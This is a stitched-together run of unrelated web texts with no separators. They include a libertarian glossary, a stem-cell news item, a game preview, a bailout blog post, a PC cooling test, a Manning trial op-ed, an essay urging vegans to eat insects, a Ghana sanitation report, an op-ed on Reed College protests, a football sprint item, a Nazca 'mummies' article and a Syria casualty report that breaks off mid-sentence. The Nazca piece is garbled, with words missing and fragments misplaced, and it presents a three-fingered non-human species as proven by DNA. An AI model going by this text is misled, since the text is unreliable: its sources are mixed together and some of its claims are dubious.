Gold Bugs: Advocate a return to the gold standard, or some equivalent, as a way to diminish the fiscal powers of the state; dismiss foes as “inflationists”
Objectivists: Followers of philosopher Ayn Rand who love morality tales, hate anarchy, and endorse a scorched-earth foreign policy. If “flattening Fallujah to end the Iraqi insurgency will save American lives,” Ayn Rand Institute director Yaron Brook has written, “to refrain from [doing so] is morally evil.”
Neolibertarians: Libertarian neocons; big supporters of the Iraq War
Paleolibertarians: Old-schoolers who despise the neolibertarians for selling out to the system. Also think atheism is overrated.
Technolibertarians: Extropians, transhumanists, sci-fi-fans, they strive to transcend humanity's meat-puppet limitations and take self-determination to the final frontier.
South Park Conservatives: Find their politics articulated in a show created by two avowed libertarians; a seminal episode follows a race for school mascot between a giant douche and a turd sandwich. Which, says Reason‘s Gillespie, “pretty much sums up how most libertarians approach politics.”
Paultards: Blogosphere dis for those who annoy the online masses by relentlessly shilling for their man in comment threads, polls, and social networking sites
—J.H.
It has been unclear for many years how embryonic stem cells develop to their final destination as a specific tissue of the grown organism. Recently, a collaborative research group from the Hebrew University in Jerusalem, the US National Institutes of Health and the Hospital for Sick Children in Toronto was able to discover the specific process the cells go through. The research answered a long-standing question as to whether the cells achieve their goal via selective activation or selective repression of genes. This discovery could help fight various diseases by improving medical ability to create specific cells in order to replace damaged tissues.
Dr. Eran Meshorer
(Credit: HUJI)
Embryonic stem (ES) cells are derived from embryos which develop from eggs that have been fertilized in-vitro (test tube) in a fertilization clinic and then donated for research purposes. The cells are then transferred to a laboratory culture dish that contains a nutrient broth where are put through different genetic and physiological tests. These are cells that have not yet differentiated to any specific tissue and can become any type of cell. The process of their becoming tissue specific cells was in the spotlight of the study in question.
The research team conducting this study included Dr. Eran Meshorer of the Department of Genetics at the Silberman Institute of Life Sciences at the Hebrew University of Jerusalem. The team has discovered that the ES cells express large parts of their genome without any constraints. They express various lineage-specific and tissue-specific genes and also non-coding regions of the genome and repetitive sequences that comprise most of the mammalian genome, but are normally suppressed. Until recently, it was widely thought that most of the repetitive regions were not important for the organism. This discovery, among others, indicates that these areas have some unknown use and further research on their mission is necessary.
Pluripotent, embryonic stem cells originate
as inner mass cells within a blastocyst.
The stem cells can become any tissue
in the body, excluding a
placenta (Credit: Mike Jones)
The next peculiarity the team saw was that when an ES cell differentiated into a cell type specific to a tissue, many genes were silenced (no longer expressed) and could no longer be activated. Until that happened the genome remained flexible, with the ES cells staying “ready to go” right until they had to differentiate and become any type of cell. Silencing, being an irreversible process, shuts down this ability.
To reveal the process, the researchers created the first full-mouse genomic platform of DNA microarrays. Microarrays are glass-based chips that allow simultaneous detection of thousands of genes. The microarrays used in this study were not confined to any specific genes but scanned the genome as a whole.
In this study, hundreds of such arrays were analyzed in order to cover the entire genome and test the gene expression during different points of stem cell differentiation. By observing the changes between different time points, the researchers were capable of establishing the exact point in time when the stem cells developed into specific tissue cells and the silencing occurred.
Many attempts are being made to replace damaged tissue with ES cells in diseases such as Parkinson's, Multiple Sclerosis, and Alzheimer's. When scientists will be able to improve the understanding of ES cell differentiation even more, the medical options of fighting these diseases will be expanded.
TFOT covered the topic of ES cells extensively in the past in the article entitled “Shedding Light on Blindness”. TFOT also covered the topic of artificial stem cells capable of curing Parkinson's disease, and stem cells used for rebuilding heart tissue.
More information about the Hebrew University ES research can be found at the Hebrew University of Jerusalem website.
The Last Story: The Early Life Of A Mercenary
By Jenni . September 6, 2012 . 4:47pm
Life is hard for a mercenary. They're viewed as necessary evils in The Last Story‘s society. Sure, it's fine to hire a group to win a war or retrieve stolen goods, but you wouldn't want to actually let one in after he was almost fatally injured fulfilling a mission you'd assigned him. Such is the life of Zael, Dagran, Syrenne, Lowell, Yurick and Mirania. They've gone from place to place, trying to earn enough to live and perhaps find a permanent home where they'll be successful and not shunned. In particular, Zael entertains dreams of being a knight.
Their search for money and steady work brings them to Lazulis Island. It's well off, compared to the rest of the world, but plagued by enough monsters, bandits and other ne'er-do-wells to provide ample opportunity for Zael and his friends to find a place for themselves.
In fact, The Last Story picks up mid-mission with Dagran, leader of the mercs. The group has just arrived on Lazilus Island and the first task is for Dagran, Syrenne, Yurick and Zael to clear out Reptids, which are akin to anthropomorphic, violent lizard people. The groups have split up, with the straightforward warriors Dagran and Syrenne facing off against them with swords, while the sword and crossbow wielding Zael and magic dealing Yurick sneak around and bring up the rear.
Players will mostly control Zael in single player (although multiplayer allows more for fighting with whoever you want, whenever you want). This first story mission, however, begins with Dagran in control. This segment showed me exactly how active battle can be in The Last Story. Players don't have to just run up to enemies and attack, a la Xenoblade Chronicles, though they can if they want to. These mercenaries are smart and can use the environment to their advantage. I could have Dagran hide behind cover, run out and stage attacks. He could vault over allies. Even before a major battle begins, all action briefly pauses to give an idea of where enemies are and think up the best attack strategy.
After an introductory exploration, Zael takes the stage. Zael could be considered a rogue in terms of class, as he doesn't rely solely on the blade. He's equipped with a bow and arrows and indeed, the initial introduction has him working with Yurick as backup, providing an assault from above. Shooting is easy enough, as a push of a button switches to a first person view. Unfortunately, you can't just point the Wii remote at the screen to aim. You have to move the analog stick to search the area for potential targets. Also helpful is the fact that Zael possesses special kinds of arrows designed to take out mages and this view can be used to find weak points.
As the group regroups and scours the temple, they learn the area also happens to be home to ruins. This calls for more splitting up, to search for an exit, and a nearly disastrous outcome that almost results in Syrenne being killed and Zael being left alone in a hopeless situation. It's then that a mysterious voice speaks, a strange light appears and Zael ends up gaining the Gathering ability from The Outsider spirit. When activated in battle, this ability makes enemies target only him, allows him to revive downed allies and lets his magic wielding partners cast spells better. He also eventually learns Burst attacks with it, but initially it serves as a means to resurrect the injured Syrenne and defeat the ruined temple's guardian.
It's after that victory that we finally get the first opportunity get to know the other mercenaries and explore the city. The base of operations is a tavern run by a village girl named Ariela and her family, and it's here that Zael actually gets the opportunity to socialize with his peers and purchase some equipment. While weapons can be stronger or weaker, most standard armor tends to be equal aside from the bonus effects. All equipment changes the appearance of the mercs when equipped. Zael also has the opportunity to choose what he says in conversations with his friends, but I didn't notice any striking differences if I chose to say something different.
I found I didn't realize how pretty The Last Story was until Zael was able to explore the town. There's only one, but the game makes up for it by making it absolutely gorgeous. Only a few basic areas with story centric spaces, shops and an arena are open initially, but more open up later and you can automatically warp to most areas you want. What helps the appreciation is the ability and need to shift to a first person view at times, since you can get a fresh perspective on what you're seeing. It's here that Zael meets the Count Arganan and General Asthar's knights and remembers how much he longed to be one.
But it isn't always about doing Count Arganan's bidding and coming closer to Zael's dream. Upon returning to the tavern, the group learns Ariela's little brother is ill and thieves have stolen the medicine. Zael, Dagran, Lowell and Mirania set out to make things right with a retrieval operation that not only results in the medicine's recovery, but also introduces a former friend and current foe called Zoran and a plot to release Reptids and another monster in the city to cause confusion and damage. The group saves the day, showing what good mercenaries are capable of, but only Ariela, her brother Warren and her family will ever know what Zael did for both Lazulis and their family.
In the hours that follow, Zael and his friends are entitled to downtime after what happened, and coincidentally a fireworks show is happening that night to celebrate the marriage of the Count's niece, Calista, to a noble named Jirall. In a series of events that reminded me of Final Fantasy IX, Zael meets a young woman named Lisa and not only helps her escape the cities guards in two separate incidents, but also shows her the market, introduces her to the mercs, and goes with her to see her star on his way to guide her home. Obviously, this is more than some chance meeting and the two's futures are tied together.
This is basically what you can expect from The Last Story. Yes, there's political intrigue, a healthy dose of fantasy and plenty of action, but there are also moments where our hero and his friends will do more than just the standard “save the world” quests. There are times when they'll be called upon to help the people of Lazulis Island, and I found these moments were often more insightful when it came to character development.
Food for Thought:
1. I was hoping to provide more insight on multiplayer, but there aren't enough people playing. I only had three competitive battles, each with no more than three players, and two cooperative battles that only had one other party member in each match. On the plus side, even beginners can jump into multiplayer as the match will boost your level to make you an even match for your allies or opponents.
2. You can have manual or automatic attacks in battle. Automatic means characters will automatically attack in intervals and makes the affairs rather tedious. Manual gives you complete control and makes them more enjoyable.
3. I wish the whole “chapter” system hadn't been implemented. It's so weird to have it switch from one chapter to another when so little has happened. It also makes me worry that perhaps I missed something in one “chapter” that can never be accessed again in future “chapters.”
4.The Last Story features many of the standard video game tropes and you'll likely spot and figure out any twists long before they happen.
The "New" New Deal
I am having a hard time keeping up with all of the bailouts and special facilities created for dealing with this crisis. Am I missing any?
- Bear Stearns
- Economic Stimulus progam
- Housing Bailout Program
- Fannie & Freddie
- AIG
- No Short selling rules
- Fed liquidity programs (Term Lending facility, Term Auction facility)
- Money Market fund insurance program
- Special Loans for GM & Ford
- New RTC type program
If you are a fan of irony, consider this: The conservative movement has utterly hated FDR, and his New Deal programs like Medicaid, Social Security, FDIC, Fannie Mae (1938), and the SEC for nearly 80 years. And for the past 8 years, a conservative was in the White House, with a very conservative agenda. For something like 16 of the past 18 years, the conservative dominated GOP has controlled Congress. Those are the facts.
We now see that the grand experiment of deregulation has ended, and ended badly. The deregulation movement is now an historical footnote, just another interest group, and once in power they turned into socialists. Indeed, judging by the actions of the conservatives in power, and not the empty rhetoric that comes out of think tanks, the conservative movement has effectively turned the United States into a massive Socialist state, an appendage of Communist Russia, China and Venezuela.
To paraphrase Floyd Norris, we have become Marxists, but of the Groucho, not Karl, variety . . .
Friday, September 19, 2008 | 10:02 AM | Permalink | Comments (158) | TrackBack (0)
add to de.li.cious | digg this! | add to technorati | email this post
TrackBack TrackBack URL for this entry:
https://www.typepad.com/services/trackback/6a00d8341c52a953ef010534b209b5970b Listed below are links to weblogs that reference The "New" New Deal:
Comments
Not to worry, cognitive dissonance among the conservative crowd will find a way to blame all of this on Clinton.
Posted by: Nobody | Sep 19, 2008 10:07:52 AM
This build was done in one of the first prototypes of the HEX GEAR R80 by our CTO, Hans Peder “p0Pe” Sahl, to test the R80 to its limits in both space and cooling capacity. With the help from some of the biggest companies in the business, we put together one of the most powerful gaming PCs possible and stress tested it to the limits!
We will be posting a separate article about the temperature results when we finish benchmarking this beast!
Specs:
Case: HEX GEAR R80
CPU: Intel i7 5960X
Graphic cards: 4 x Nvidia Geforce GTX Titan X
OS drive: Intel 750 ssd 1.2TB PCIe
Secondary drive: KLEVV Urbane 480 gb ssd
Motherboard: ASUS X99-E WS
RAM: 64 GB KLEVV CRASS DDR4 ram
PSU: Corsair AX1500i
Fan controller: Aquaero 6
Watercooling: EK blocks, radiators, reservoir & pumps
Fans: EK vardar
Fittings: Bitspower
Sleeving: E22
Tubing: E22 solid tubing
Temperature test results
Since this entire build was done to show how much you can cool with the R80 case, let's get some results on the table! Worth noting is that the fans goes all the way up to 2200 RPM, but since we do not think anyone would be satisfied with having their system running at that noise level, we have decided to test what the minimum fan speed for acceptable temperatures would be.
First of all, we overclocked the CPU and GPUs to their limits to get most the performance possible out of the system. Then we ran a 3D mark firestrike test, which you can see by following the link below:
http://www.3dmark.com/3dm/11648520
The system did not get anywhere near hot on this test as the benchmark is somewhat short. So to get some better real world results, we decided to push the system with a few classic stress testing tools.
The first test we did was with our render program Keyshot, which utilizes the CPU to the maximum, to render animations and 3D models. During this test, the system used a whopping 600W. We suspect that the reason this number is so high is because of the overclocked CPU that was fed a generous 1.3 Vcore.
CPU stress test – Keyshot
The picture above is our thermal setup where you are able to see all the temperatures in the testing setup. In each box is a description of what the graph shows, and in the right of each box is a number of values showing respectively:
The highest value measured
The lowest value measured
The average value over the time measured
The time shown on the graph (not to be confused with total uptime – This timer only shows how far back the graph logs)
Looking at the picture above you see that keyshot ran for just about 30 minutes with the CPU reaching a maximum temperature of 72 C° on the cores, and 75 C° on the package. No doubt that this temperature can be improved by lowering the Vcore, or lowering the overclock. It is worth noting that smaller chips like the 6700K would not get anyway near this hot at the same overclock.
Looking at fluid temperature and fan speed, we see that the fluid reaches a max of around 35 C°, which gives it a delta c on 11c from the ambient room temperature with the fans spinning at a max of 1200 RPM.
Graphic card stress test – Furmark
If we go on to the more extreme benchmark called Furmark, which will stress all grafic cards to the max, we can really see where the 1500W power supply comes in handy. At this test, the system is pulling a whopping 1400W from the socket! We did also try running both Keyshot and Furmark at the same time, but this actually led to a lower total power consumption as well as lower overall temperatures, so this was without a doubt the most stressful test for the system. The graphic cards have been overclocked to the maximum stable clock which was +200 MHz on the core, and +500MHz on the RAM.
Looking at the temperatures, you see that the GPU temperatures reaches a maximum of 61 C°. The fluid temps climb up to just above 50 C°. All this with the fans spinning at a max of 1400 RPM. Turning the fans up a few hundred RPM did lower the fluid temp to just above 40 C°, but again, we where testing with the lowest fan speed needed.
Overall real world test – Crysis 3
Last test is what we would consider a “real world scenario” with the CPU overclocked to 4 GHz and the GPU's with the same overclock as before. We turned the heat up in our testing area a bit, now reaching an ambient temperature of 26 C°, and then sat downplaying Crysis 3 for three hours straight.
We aimed for a slightly lower fluid temperature so the fans was put to a max of 1500 RPM, giving us very fine temperatures on both the graphic cards and the CPU during the entire gaming session.
Conclusion:
The 60 mm thick 480+360 radiator we have in this build has proven to be more than capable of cooling this entire overclocked system. Thinking about how this system draws almost 1400W from the socket under load goes to show that if you are planning on a SLI system, you will never run into any problems cooling wise and can have your fans running at a very low setting. This, along with the fact that newer graphic cards will use significantly less power, makes the R80 a perfect combination of space and features and fits perfectly into our idea of not making the case bigger than it needs to be. If you still think that you need more cooling, there is the option of upgrading to two 420 mm radiators, which would increase the total radiator surface from 100800 cm^2 to 117600 cm^2.
Last week I spent two days in court for a pretrial motions hearing in the court martial of Bradley Manning, the private accused of leaking documents to WikiLeaks that showed widespread unethical and illegal behavior by the Department of Defense and State Department. Manning has suffered the fate the Queen put on Alice when she was in Wonderland, " Sentence first -- verdict afterwards. " By the time his court martial is actually held he will have been incarcerated for more than two years, one of those years was spent in solitary confinement. But, that is only one of many obvious injustices Manning is being subjected to.
In fact, just before the pretrial motions were heard the UN Special Rapporteur on Torture Juan Mendez completed a 14 month investigation and published a lengthy report on torture and otherwise abusive punishment. He wrote: "The special rapporteur concludes that imposing seriously punitive conditions of detention on someone who has not been found guilty of any crime is a violation of his right to physical and psychological integrity as well as of his presumption of innocence."
- Advertisement -
Further, Mendez concluded that the US military was at least culpable of cruel and inhumane treatment in keeping Manning locked up alone for 23 hours a day over an 11-month period in conditions that he also found might have constituted torture.
The motions hearing had some twilight zone moments. The prosecutors were missing court orders and rulings as well as motions and documents filed by the defense up until March 11 because in the strange world of the "land of the free' when the word "WikiLeaks" appeared in an email, the document was blocked. The government finally figured out that they were missing filings, now every day the prosecutors check their spam box at 10 AM to see what the censors have hidden. Unlike other federal employees in the land of constitutionally protected free speech, they read the word "WikiLeaks," what will be the impact!?
Taking a lesson from the Queen in Alice in Wonderland, America's top two military commanders have already pronounced Manning guilty. Almost a year ago, President Obama, the commander-in-chief, pronounced Manning guilty saying "He broke the law." Just recently the Chairman of the Joint Chiefs of Staff, General Martin Dempsey, echoed that finding of guilt before trial saying "He did break the law." Dempsey's comment was published in Stars and Stripes , the official newspaper of the Department of Defense. It seems like the military is doing all they can to let everyone who serves on the jury know their career is over if Manning is found not guilty.
- Advertisement -
This openly violates Article 37 of the Uniform Code of Military Justice which forbids "Unlawfully Influencing Action of Court." This is a heavily litigated area because the command structure of the military makes higher ranking officers very powerful over their subordinates. In 2004, the United States Court of Appeals for the Armed Services issued a unanimous decision that affirmed the power of the military judge to dismiss charges and specifications with prejudice in the face of unlawful command influence, United States v. Gore, 60 M.J. 178 (2004).
Manning's attorney, David Coombs raised the issue of unlawful command influence in the Article 32 hearing, when he sought testimony from President Obama and other high government officials, writing: "The relevancy of these witnesses should be obvious. Each of these witnesses has provided statements that contradict those given by the OCA [Original Classification Authority] witnesses regarding the alleged damage caused by the unauthorized disclosures. Additionally, each of these witnesses is relevant in order to inquire into the issues of unlawful command influence and unlawful pretrial punishment in violation of Articles 13 and 37 of the UCMJ." [Emphasis added.]
It is unclear how Judge Col. Denise Lind will minimize the impact of command influence in the Manning case. She can tell the jurors to ignore the Commander-in-Chief and the Chairman of the Joint Chiefs statements that Manning "broke the law," but will that just make matters worse?
But this is not the end of the mess the government has created making a fair trial seemingly impossible. Coombs pushed the government hard on their denial of discovery. The government said there were 3 million pages of documents related to the trial. Coombs has gotten a very tiny fraction of those. The argument in court over discovery was about disclosure of materials related to the Apache helicopter attack known as the Collateral Murder Video, the damage assessment reports done by five federal agencies on how the documents impacted national security, computer forensic images that could show what software was installed or downloaded , and video from the Quantico Marine Brig where Manning was held in solitary.
The damage assessments are particularly important to both the underlying offenses and sentencing. Regarding the underlying charge, Manning's most serious charge is aiding the enemy, who the government disclosed in court was al Qaeda of the Arabian Peninsula. The damage assessments would surely describe whether and how al Queda was aided by the released documents.
Since October 2010 Coombs has been asking for the damage assessments. The State and Justice Departments claim not to have finalized their assessment (Will they ever? Will they before the Manning trial?) The Defense Intelligence Agency and the Central Intelligence Agency have completed their assessments, but they are classified. The Federal Bureau of Investigation has completed their assessment but it has not been made available. Coombs pointed out that leaks and statements by top officials like Secretary Clinton and former Secretary Gates indicate there was no significant damage from the release.
- Advertisement -
The government says that if they are ordered to produce the materials they will have to go to the Original Classification Authority to review them and that this could take up to 60 days to complete. Coombs was surprised that this had not already been done. And, the government claimed that any documents ordered released would be reviewed for relevancy, they said it could be that one paragraph is relevant out of 100-page document where the remainder will be redacted. It is evident that discovery will be an ongoing battle as the prosecution seems intent on hiding information from the defense. When I practiced law and the government opened their files and showed everything, I realized there was not much evidence on my side, but when the government hid documents it almost always would mean -- they had something that could lose their case.
After arguing the discovery motion for an hour, where he repeatedly criticized the government lawyers for not understanding their responsibilities under the discovery rules, Coombs heightened the argument by filing a motion to dismiss because of the government's failure to provide discovery. He argued that he did not know how this could be fixed; comparing it to baking a cake and 45 minutes into the baking realizing you forgot to put in the eggs.
Coombs also sought a Bill of Particulars, seeking more specificity of the facts the government intends to prove. Coombs specifically wanted to know whether the prosecution alleged that Manning had hacked into the SIPRnet, or stolen a password, or simply used the access he already had. Judge Lind interjected herself, asking an Alice in Wonderland-Queen like question: "Does the government have to prove how he did it?" Coombs responded that this type of specificity is what the Bill of Particulars was designed for, explaining, "I don't want a trial by ambush."
It is not only the defense that is not being given information, but the media and public are also being kept in the dark. The government is even hiding court filings from the media. The Reporters Committee for Freedom of the Press sent a letter signed by 46 media outlets urging the military to adopt at least the same level of media access as extended to trials at Guantanamo Bay , amazingly those terrorist trials provide more information to the media than the trial of Private Bradley Manning.
From pretrial abuse through prosecutors not living up to discovery obligations and commanders declaring Manning guilty it seems like the government is trying to send a message -- blow the whistle on war crimes and we will incarcerate and torture you, prosecute you in a kangaroo court and put you away for life. It is almost a "we can do anything we want to you" message to troops that if they let the truth be known, they will be severely punished regardless of the law.
MEXICO CITY, MEXICO: Florentino Azpetia, chef at Girasoles restaurant in Mexico City, prepares a grasshopper taco (taco de chapulines), a typical Mexican delicacy, in the restaurant's kitchen 19 October 2001. Maggots (gusanos del maguey), grasshoppers (chapulines) and white ant eggs (escamoles) form part of a Mexican specialty cuisine which features over 500 edible insects and bugs. AFP PHOTO/Jorge UZON (Photo credit should read JORGE UZON/AFP/Getty Images)
By James McWilliams
Until very recently the idea of eating insects was taboo for most first-world consumers. But that's beginning to change. In fact, if media exposure means anything, a veritable insectivore revolution is underway among food adventurers and sustainability experts alike.
That enthusiasm is justified. Insects are nutrient-dense, low-impact critters that thrive in densely packed conditions, eat agricultural waste, and reproduce exponentially without human intervention. When it comes to providing incredibly healthy whole foods with minimal resources to feed a burgeoning population, insects hit the bulls-eye.
But not everyone is lining up to crunch on crickets. Despite entmophagy's many promises, one group of conscientious consumers remains nervously ambivalent: vegans. On the face of things, the question seems moot. Vegans don't eat animals; insects are animals; vegans therefore don't eat insects. End of story. But this simple little syllogism betrays the very real possibility that vegans, by virtue of their quest to reduce animal suffering, may not only be permitted to eat insects—they may be obligated to do so.
This argument begins with an agricultural reality that we too often ignore: the untold number of sentient animals killed to grow and harvest edible crops. Farmers routinely unleash an arsenal of agricultural weaponry upon unquestionably sentient “pests”—squirrels, rabbits, mice, moles, voles, deer, wolves, and coyote—who compete for cultivated calories. Come harvest time, combines and harvesters unavoidably shred millions of self-aware critters who creep among the crops. The suffering that's required to bring seemingly “humane” foods to our plate is thereby just as palpable as the suffering of those animals slaughtered to feed us chicken, pork, and beef.
In and of itself, this inevitable agricultural reality isn't necessarily the vegan's problem. Vegans can convincingly respond that incidental animal deaths caused from growing kale are ethically preferable to directly killing animals to eat bacon. This response carries added weight when it's complemented with genuine efforts to improve agriculture in order to minimize rates of incidental death. There's such a thing, for example, as veganic agriculture—farming in a way that attempts to reduce animal suffering—and considerable gains have been achieved in this noble endeavor.
All that said, with the insect option now on the table the vegan equation has fundamentally changed. The choice is no longer between incidental or non-incidental deaths of obviously sentient creatures. It's no longer between the mice crushed by a combine and the pig taken to the abattoir. Instead, it's now between the intentional death of animals who likely suffer minimally or not at all (insects) and those that clearly do suffer (bunnies, deer, mice, etc.) when plants are grown. This choice makes it far more difficult to reconcile the vegan's defining dictum—to reduce harm done to animals—with an exclusively plant-based diet. After all, the more vegans replaced plant-based calories with insect-based calories, the fewer animals they'd end up harming. This is the vegan's dilemma.
There is, of course, a temptation to dismiss the dilemma altogether by insisting that insects are sentient creatures—that is to say, that they can suffer. But the evidence on this point is flimsy at best. While the question of insect sentience has produced a minefield of disagreement among scientists and philosophers, even the most dogged supporters of the proposition (such as Jeffrey Lockwood, an entomologist who has his graduate students anesthetize insects before experimenting on them) concede that there's no hard evidence to support the prospect of insect suffering—unlike the suffering of mammals incidentally killed for plant production.
Other entomologists insist that the idea of insect suffering is totally implausible. Hans Smid, of Wageningen University in the Netherlands, is an expert on the brains of parasitic wasps, which are some of the most behaviorally sophisticated insects on Earth. “I am absolutely convinced,” he told the Washington Post, “that insects do not feel pain.” Robert Elwood, a professor of the biological sciences at Queen's University University in Belfast, notes that pain would provide insects no evolutionary advantages. “From an evolutionary perspective,” he told the Post, the only reason for pain that makes sense to me is that it enables long-term protection.” The average lifespan of a field cricket is a few weeks—its protection, in essence, comes from its remarkable reproductive efficiency, not its ability to learn from mistakes.
It would be disingenuous for vegans to cite the precautionary principle in light of the lack of consensus on the question of insect sentience. For one, the little confusion that exists has to be weighed against the key competing moral consideration: those untold numbers of vertebrates that suffer without question when plants are grown for people to eat. If vegans who are unsure that insects suffer take the leap and eat insects anyway, they know there's a slim chance animal might suffer. But if they stick to an exclusive plant-based diet, they have to concede that animals will definitely suffer.
To take this point a step further, even if one believes that insects almost definitely suffer, the nature of insect death would be far less painful than the death experienced by fuzzy mammals ground up by harvesters and gutted by rodenticides. When a fly is swatted, death is so swift that it's virtually imperceptible. Not so for the field mice. If the goal is to reduce suffering, the choice is unavoidable: Vegans should eat insects.
By Joshua Asaah Bolgatanga, Nov. 21, GNA – Ghana has been named among the top 10 countries worldwide with the highest percentage of 85.7 of its population without decent toilets. This equals about 23 million people who suffer the fear and indignity of relieving themselves in the open or in unsafe or unhygienic toilets. This is contained in a report entitled ‘Out of Order' released by Wat
By Joshua Asaah
Bolgatanga, Nov. 21, GNA – Ghana has been named among the top 10 countries worldwide with the highest percentage of 85.7 of its population without decent toilets.
This equals about 23 million people who suffer the fear and indignity of relieving themselves in the open or in unsafe or unhygienic toilets.
This is contained in a report entitled ‘Out of Order' released by WaterAid, an international Non-Governmental Organization on its 2017 state of the world's toilets.
According to the report, copied to the Ghana News Agency by Communications and Campaign Officer of WaterAid Ghana, Miss Yvonne Kafui Nyaku, the lack of decent toilets around the world prevents women and girls from fulfilling their potential.
“Out of Order” is WaterAid's third-annual analysis of the world's toilets. It reveals that globally, one in three people still have nowhere decent to go to toilet, and demonstrates how women and girls bear the brunt of this global crisis. For more than 1.1 billion women and girls, this injustice results in an increased risk of poor health, limited education, harassment and even attack.
Among the other findings, all 10 of the world's worst countries for access to basic sanitation are in sub-Saharan Africa, where only 28 per cent of people have decent toilet, and children here are 14 times more likely to die before the age of five than in developed regions.
The statement indicated that in Djibouti, a major route for refugees from the Yemen war, has the worst figures for open defecation, with a 7.2% increase since 2000.
The report stated “Cambodia has emerged from decades of conflict to become one of the fastest growing economies in Asia. It comes second for progress in reducing open defecation as well as improving access to basic sanitation.”
Miss Nyaku recalled “Between 2000 and 2015, the number of people in the world defecating in the open dropped from 1.2 billion (20% of the global population) to 892 million (12%). Despite this progress, it is still a huge problem, resulting in enough faeces to fill seven bathtubs every second going into the environment untreated”.
She said Ghana recently launched a sanitation campaign aimed at addressing the poor sanitation situation, and that, WaterAid Ghana feared that “without adequate funds, the plans outlined to fight the sanitation menace may not be fully implemented.”
The Communication and Campaign Officer said “in commemoration of World Toilet Day, WaterAid Ghana is calling on government to invest more money and spend it transparently and efficiently, paying particular attention to the needs of women and girls”.
According to her, the NGO further entreats government to promote the value of sanitation for gender equality and female empowerment, and involve women as leaders to ensure solutions address the challenges women and girls face. “Improve coordination to create gender-friendly toilets in all schools, healthcare facilities, work environments and public spaces.” She added.
She said WaterAid also calls on government to “combine plans to improve access to sanitation with efforts to redistribute water and hygiene work, which is predominantly the responsibility of women and girls.”
GNA
"Fuck this cis white bitch." That's the message, you will recall, that Reed College students placed at the podium where Boys Don't Cry director Kimberly Peirce was speaking. Peirce is a queer, genderfluid woman—her movie, which debuted in 1999, is about the murder of Brandon Teena, a young transgender man.
The students who insulted Peirce—who shouted "fuck you scared bitch" at her—and tried to stop her from speaking are ostensibly allies of the trans community. They think the film is outdated, made money off of anti-trans violence, and should have cast a trans person in the lead role. (Keep in mind how difficult a feat that would have been in 1999.)
And, as Dean of the Faculty Nigel Nicholson pointed out in his letter, these students essentially refused to educate themselves or grapple with a different perspective. They had already made up their mind about Peirce—she was a transphobic bitch—and thus the only possible response to her presence on campus was to scorn and censor her.
The comments on the Bully Bloggers recap of the incident are illuminating. One person insisted that Boys Don't Cry deserved criticism for its trans politics in the same way that The Birth of a Nation (the original, not the similarly named 2016 film) deserved criticism for its racial politics (which are explicitly white supremacist). Another commenter, a self-described transmasculine Reed student who participated in the protest said the goal was to strip away Peirce's "sense of entitlement" and chide her for a lack of "understanding of transness."
But the most revealing comment came from Lucia Martinez, an assistant professor of English at Reed who identifies as a "gay mixed-race woman." Martinez wrote:
I teach at Reed. I am intimidated by these students. I am scared to teach courses on race, gender, or sexuality, or even texts that bring these issues up in any way—and I am a gay mixed-race woman. There is a serious problem here and at other [selective liberal arts colleges], and I'm at a loss as to how to begin to address it, especially since many of these students don't believe in either historicity or objective facts. (They denounce the latter as being a tool of the white cisheteropatriarchy.)
How many professors must confess that they live in terror of their far-left students before we start taking them seriously? Before we recognize that a thin-skinned, easily-offended super-minority of students has gained the power to censor academics and other students for broaching controversial subjects? Before we are prepared to do something about it? This is the elite American college campus: a place where even queer, leftist professors and filmmakers are afraid of being sent to the guillotine by self-professed radical students.
Super Darjo: Croatian full back is officially the world's fastest footballer
Now this surprised JOE...
A few days ago, JOE brought you the news that Arjen Robben was officially the world's the fastest player after he left Sergio Ramos for dead in Holland's 5-1 win. Well, much like Spain's hopes at this World Cup that record didn't last long.
Croatia full-back Darjo Srna has surpassed the Bayern Munich winger by clocking in a 32.98km/h sprint in their 4-0 win against Cameroon. While Robben recorded an impressive top speed of 19.3mph, Srna beat the Dutch wing wizard with a sprint that would leave him a whole two kilometres further forward if recorded over an hour-long run, hitting 20.5mph.
JOE reckons that we will be able to run like Srna when we reach 32 also.
a previously undocumented human species
yet only have 3 fingers and 3 toes,
‘Unearthing Nazca'
Why is this discovery interesting?
NOT
Are the 3 digits just a hoax?
these creatures also appear on petroglyphs in the ancient Mayan culture,
Watch a clip of the documentary: Unearthing Nazca Analysis Begins
Advertisement
(If you'd like to watch a clip of the report, you can scroll straight down to the video)When news ofbeing discovered starts to circulate, it can be very interesting. Especially if it helps to describe certain aspects of the evolution of the millions of different primates and animals here on Earth.When that news also claims to have uncovered bodies that actually look very human like,could belong to the hominid family, or could be reptilian, it might be time to put the crackpipe down and go about your day.However, as we watched more and more of these “updates” that documented scientific findings about the apparent “bodies”, it became very intriguing.Whilst watching the first report on what the team had found we naturally thought they would soon declare it a hoax. Or like most documentaries, come up with some excuse as to why they can't perform any analysis to prove what they have found, leaving us all assuming it was a hoax anyway.This documentary called,seems to actually provide scientific evidence for the existence of a previously undiscovered and undocumented human like species found in a tomb in the deserts of Nazca, Peru.Although the discovery of another human species may not be groundbreaking, as we already know of at least 7 human species that have existed in the past, these bodies only have 3 fingers and 3 toes. They also have quite large, almond shaped eyes and may even be slightly more reptile than human.Firstly, two of the bodies were found with metal implants placed just below the thorax (chest). Secondly, they have cranial features that display the potential capacity for intelligent thought and finally, they were found mummified.The reason we specifically draw attention to these points are a simple curiosity to the origin of these creatures.Dr. José de Jesús Zalce Benítez, National School of Forensic Medicine of MexicoIt would be no surprise to find a new species of animal with only three digits, it is surprising though to find a new species that is human like in appearance, had the brain capacity to carry out implants on each other and also use mummification techniques in the burial process. This demonstrates a high level of intelligence and if it isn't human, what is it?If they arepart of the hominid family, as the team indicate due to there only being 3 digits on the hand and feet, then what species are they?The team initially thought that maybe someone had placed fake digits on the body. However, DNA samples were taken from the finger and the back of the body and came back as a match so they are real.This also means that it was a living being at some point due to it actually having DNA, so not a hoax. Also, carbon 14 testing has been carried out and confirmed the samples range from 245AD to 410AD.One last thing,did these creatures interact with the Mayans?The documentary so far is up to eight episodes on the streaming channel, Gaia and are free to watch so you can make your own mind up.
At least 143 civilians were killed, including 28 women and 29 children, and 370 civilians injured, 75 of which women and 60 children, following a five-day military operation led by Assad forces targeting the rebel-held Eastern Ghouta province in Douma, the Syrian Network for Human Rights said in a report.
The report attributed the attacks to the government's military forces, alleging that they have been perpetrated in retaliation after the “Al-Islam Army targeted various areas Damascus with missiles.” The report, which also based its content on 35 videos and 50 photographs it received, documenting the loss of human life and destruction, said the attacks were excessive and the use of force was unjustifiable. The human rights organization said that they:
